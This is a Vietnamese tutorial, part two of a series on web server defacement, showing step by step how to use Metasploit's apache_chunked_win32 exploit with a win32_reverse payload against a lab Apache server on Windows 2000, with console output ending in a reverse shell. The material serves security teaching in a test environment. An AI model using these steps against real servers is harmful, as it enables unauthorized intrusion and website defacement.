Xem mẫu
- Các hoạt động phá hoại Web Server (Phần 2)
- Trong phần hai của loạt bài này chúng ta sẽ xem xét kỹ hơn cách thức
deface (tức phá hoại hay thay đổi lại giao diện) một trang Web hoàn
chỉnh. Công cụ được sử dụng ở đây là chương trình bảo mật nguồn mở
khá nổi tiếng Metasploit Framework. Phần hướng dẫn chi tiết giúp bạn
hiểu và tạo lại chương trình dễ dàng.
Tóm tắt phần một
Chúng ta sẽ tóm lược vắn tắt nội dung đã nêu ở phần một. Ở bài trước chúng
ta đã nói đến cách thức một Web server có thể bị deface như thế nào và giới
thiệu công cụ sử dụng cho hoạt động thử nghiệm để tự deface là gì. Trước
khi tiếp tục xin được nhắc lại là các lỗ hổng tái tạo, hay trường hợp này là
hoạt động deface Web server hoàn toàn hợp pháp trong chương trình học tập
về bảo mật máy tính. Tuy nhiên bạn phải làm thử nghiệm ở môi trường thí
nghiệm như đã nêu trong phần một. Mặc dù biết có nhiều điểm hạn chế,
nhưng ít nhất cũng thoả mãn được phần nào trí tò mò của bạn. Chúng ta
cũng sẽ khai thác Metasploit để hiểu sâu hơn về các hoạt động deface Web
server.
Từ lý thuyết đến thực tế
Chúng ta sẽ tiếp tục với công cụ Metasploit và cách sử dụng nó. Trước hết là
tăng mức hệ thống truy cập vào Web server Apache. Khi bạn thấy lớp ngoài
đảo ngược, bạn có thể upload file index.html đã được thay đổi. Nó sẽ trở
thành trang mặc định được đưa lên server, chẳng hạn như bản dữ liệu log
của công ty bạn.
- Phần bên dưới cho biết điều gì thu được sau câu lệnh "show exploits" (đưa
ra các lỗ hổng) khi bạn nhập nó ở màn hình lệnh prompt msf trong
Metasploit. Danh sách các lỗi hổng có thể khai thác được đưa ra:
msf > show exploits
Metasploit Framework Loaded Exploits
====================================
Credits Metasploit Framework Credits
AppleFileServer LoginExt PathName
afp_loginext
Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
ISS PAM.dll ICQ Parser Buffer
blackice_pam_icq
Overflow
distcc_exec DistCC Daemon Command Execution
Exchange 2000 MS03-46 Heap
exchange2000_xexch50
Overflow
Frontpage fp30reg.dll Chunked
frontpage_fp30reg_chunked
Encoding
ia_webmail IA WebMail 3.x Buffer Overflow
iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
- iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow
Bạn có thể thấy một số lỗ hổng có thể khai thác bên trong framework đã đưa
ra. Danh sách trên đã được cắt bớt. Nếu bạn nhập cùng một lệnh như vậy,
bạn sẽ có được danh sách đầy đủ. Chúng ta sẽ thử nghiệm với lỗ hổng thứ
hai từ trên xuống: apache_chunked_win32.
Bây giờ nhập lệnh để chọn lỗ hổng chúng ta sẽ dùng như sau:
msf > use apache_chunked_win32
msf apache_chunked_win32 >
Như bạn thấy ở trên, màn hình lệnh prompt xuất hiện trở lại, báo lại cho bạn
biết lỗ hổng đã được chọn để dùng: apache_chunked_win32. Tiếp theo là
lệnh kiểm tra các tuỳ chọn khác nhau gắn kèm với lỗ hổng dưới framework
này.
msf apache_chunked_win32 > show options
Exploit Options
===============
Exploit Name Default Description
-------- ------ ------- ------------------
optional SSL Sử dụng SSL
required RHOST Địa chỉ đích
- required RPORT 80 Cổng đích
Target: Windows NT/2K Brute Force
msf apache_chunked_win32 >
Màn hình lệnh xuất hiện trở lại với danh sách các tuỳ chọn chúng ta cần điền
đầy đủ như địa chỉ IP host từ xa. Chú ý là bạn cũng cần phải nhập địa chỉ IP
host cục bộ, ví dụ như địa chỉ các máy tấn công của bạn trong môi trường
thử nghiệm. Bạn cần nhập lệnh thiết lập các tuỳ chọn đó như sau:
msf apache_chunked_win32 > set RHOST 192.168.1.101
RHOST -> 192.168.1.101
msf apache_chunked_win32 >
Chúng ta sẽ xem tuỳ chọn LHOST ở phần sau trong bài này.
Bạn thấy gì từ các tuỳ chọn khai thác lỗ hổng?
Bây giờ chúng ta sẽ thiết lập giá trị cho trường này. Sau đó tiếp tục thực hiện
dần dần với các tuỳ chọn khác nhau khác trước khi sử dụng lỗ hổng để tăng
mức truy cập hệ thống trên Web server. Ở đây bạn sẽ dùng lệnh sau để xem
chúng ta có thể dùng được loại payload nào:
msf apache_chunked_win32 > show payloads
Metasploit Framework Usable Payloads
====================================
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
- win32_bind_stg Windows Staged Bind Shell
Windows Staged Bind
win32_bind_stg_upexec
Upload/Execute
Windows Bind VNC Server
win32_bind_vncinject
DLL Inject
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
Windows Reverse InlineEgg
win32_reverse_stg_ie
Stager
Windows Staged Reverse
win32_reverse_stg_upexec
Upload/Execute
Windows Reverse VNC Server
win32_reverse_vncinject
DLL Inject
msf apache_chunked_win32 >
Lựa chọn trên cho phép sử dụng bất kỳ phần nào bạn chọn. Có nghĩa là bạn
sẽ có thể thực thi bất kỳ playload nào đã chọn bằng CPU của máy nạn nhân
khi khai thác lỗ hổng bạn đang nhắm đến. Có thêm lựa chọn mở rộng này là
một trong nhiều cách dùng tuyệt vời của công cụ bảo mật.
Có rất nhiều lựa chọn dành cho bạn. Ở trường hợp của chúng ta là
win32_reverse payload vì nó giúp tạo ra được lớp vỏ bên ngoài, cho phép sử
- dụng được nhiều lần khai thác để tấn công. Để rõ hơn bạn có thể copy lại
file index.html và điều chỉnh nó bằng cách thay đổi giao diện. Xây dựng
được lớp bên ngoài cho phép chúng ta thực hiện điều đó. Còn Framework
bạn có tuỳ chọn payload thì sao? Hãy xem cú pháp bên dưới:
msf apache_chunked_win32 > set PAYLOAD
win32_reverse
PAYLOAD -> win32_reverse
msf apache_chunked_win32(win32_reverse) >
Bây giờ chúng ta đã thiết lập thông số cho payload và quay trở lại màn hình
lệnh. Tiếp theo là thiết lập địa chỉ IP để nhận lớp ngoài đảo ngược. Thiết lập
cho host nhận cũng tương tự như một vài bước biết lập cho RHOST trước
đây để đặc tả máy sẽ tấn công. Thực hiện như sau:
msf apache_chunked_win32(win32_reverse) > set LHOST
192.168.1.102
LHOST -> 192.168.1.102
msf apache_chunked_win32(win32_reverse) >
Bây giờ chúng ta đã thực sự sẵn sàng khởi động lỗ hổng. Cú pháp như sau:
msf apache_chunked_win32(win32_reverse) > exploit
192.168.1.101
[*] Starting Reverse Handler.
[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding
of 348...
[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of
348...
[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding
- of 352...
[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of
352...
[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding
of 356...
[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of
356...
[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding
of 360...
[*] Got connection from 192.168.1.101:1031
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\Apache Group\Apache>
Từ trên bạn có thể thấy màn hình lệnh trong thư mục Apache. Có một tuỳ
chọn khác chúng ta có thể sử dụng để đặc tả hệ điều hành đang dùng trong
trường hợp này là "target". Ngay cả khi bạn không mô tả tường minh, nó
cũng sẽ cố gắng "thu xếp" để thực hiện những việc nó có thể làm. Để dùng
tuỳ chọn target (đích), thực hiện như sau:
msf apache_chunked_win32(win32_reverse) > show
targets
Danh sách các đích (target) sẽ được đưa ra. Tất cả việc bạn cần làm là chọn
thứ bạn muốn và thiết lập nó như đã làm ở trên:
msf apache_chunked_win32(win32_reverse) > set
TARGET 1
- Câu lệnh trên nhập đích thứ nhất nếu server bộ nhớ là W2K Pro,
Công việc đến đây có thể nói là đã hoàn thành. Web server Apache bây giờ
đã bị bạn xâm hại và có phần bên ngoài đảo ngược. Bạn hoàn toàn có quyền
kiểm soát và thao tác trên nó. Chúng ta kết thúc phần hai ở đây và sẽ tiếp tục
trở lại phần ba, phần cuối cùng để thực sự phá hoại một trang Web và suy
ngẫm về hậu quả phía sau của các cuộc tấn công như thế nào.
nguon tai.lieu . vn